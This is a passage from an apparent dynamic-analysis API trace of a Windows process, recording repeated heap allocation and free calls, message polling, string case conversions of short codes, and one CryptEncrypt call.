returned 0x24b1c48 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.453] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.455] CharLowerBuffW (in: lpsz="byte[69928]", cchLength=0xb | out: lpsz="byte[69928]") returned 0xb [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.458] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.459] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.459] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.460] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.461] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c8b78*, pdwDataLen=0x8bef68*=0x11122, dwBufLen=0x11128 | out: pbData=0x24c8b78*, pdwDataLen=0x8bef68*=0x11128) returned 1 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.465] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.465] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.465] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.465] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.466] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.466] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.466] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.466] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.467] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.467] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.467] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.467] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.468] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.468] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.468] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.468] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.468] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.468] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 